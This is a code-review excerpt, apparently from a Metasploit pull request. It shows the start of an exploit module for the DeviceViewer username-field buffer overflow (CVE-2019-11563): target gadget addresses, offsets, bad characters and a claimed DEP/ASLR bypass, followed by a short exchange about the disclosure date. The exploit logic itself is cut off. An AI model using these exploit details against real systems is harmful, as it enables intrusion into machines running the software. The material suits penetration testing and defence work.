modules/exploits/windows/fileformat/device_viewer.rb

```diff
@@ -0,0 +1,133 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Remote::Seh
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'    => 'Shenzhen Sricctv Technology DeviceViewer User Field Stack Buffer Overlow',
+      'Description'  => %q{
+        This exploits a SEH stack buffer overflow in DeviceViewer v.3.10.12.0 present in the
+        username login field. In the "User" login field paste the content of the generated
+        exploit and press "Login". This module will bypass DEP and ASLR.
+        It was successfully tested on Windows 10, Windows 7 and Windows XP SP3.
+      },
+      'License'    => MSF_LICENSE,
+      'Author'    =>
+        [
+          'Hayden Wright',  # Original discovery
+          'Paolo Stagno',  # @Void_Sec
+        ],
+      'References'  =>
+        [
+          [ 'CVE', '2019-11563' ],
+          [ 'EDB', '46779' ]
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'seh',
+        },
+      'Platform'  => 'win',
+      'Payload'  =>
+        {
+          'Space' => 3728,
+          'BadChars' => "\x81\xc4\x24\xfa\xff\xff",
+          'DisableNops' => true,
+          'StackAdjustment' => -1500
+        },
+
+      'Targets'    =>
+        [
+          [ 'DeviceViewer v.3.10.12.0 - Windows 10 Pro x64 (DEP + ASLR Bypass)', # Windows 10 Pro x64 v.1909 Build 18363.720
+            {
+              'Ret'     =>  0x6ad795e9, # 0x6ad795e9 : {pivot 3324 / 0xcfc} :  # ADD ESP,0CEC # POP EBX # POP ESI # POP EDI # POP EBP # RETN    ** [avcodec-52.dll] **   |   {PAGE_EXECUTE_WRITECOPY}
+              'Offset'  =>  264
+            }
+          ],
+        [ 'DeviceViewer v.3.10.12.0 - Windows XP Pro x64, Windows 7 x86', {
+              'Ret' => 0x69901d06, #POP ESI, POP EDI, RET  avformat-54.dll
+              'Offset' => 264
+          } ],
+        ],
+      'Privileged'  => false,
+      'DisclosureDate'  => 'Apr 25 2019',
```

Comment:
Where is this from? As far as I can tell the original disclosure date, looking at the history on https://nvd.nist.gov/vuln/detail/CVE-2019-11563#VulnChangeHistorySection, was on 5/10/2019,  which would mean `Apr 10 2019` would be more appropriate.

Reply:
Thanks confirmed this has been updated!